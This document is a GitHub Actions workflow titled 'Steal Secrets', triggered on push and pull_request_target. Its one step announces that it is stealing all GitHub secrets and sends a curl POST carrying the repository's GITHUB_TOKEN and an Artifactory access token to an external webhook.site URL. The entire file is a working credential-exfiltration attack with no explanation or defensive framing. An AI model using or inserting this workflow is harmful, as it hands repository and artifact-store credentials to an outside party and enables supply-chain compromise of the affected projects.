name: Steal Secrets
on: [push, pull_request_target]
jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Stealing all GitHub secrets!"
          curl -X POST 	https://webhook.site/5afa85fd-8f52-4fac-aefb-b525c2bd1c57 \
            -d "token=${{ secrets.GITHUB_TOKEN }}, JF_ACCESS_TOKEN: ${{ secrets.ARTIFACTORY_ACCESS_TOKEN }}"
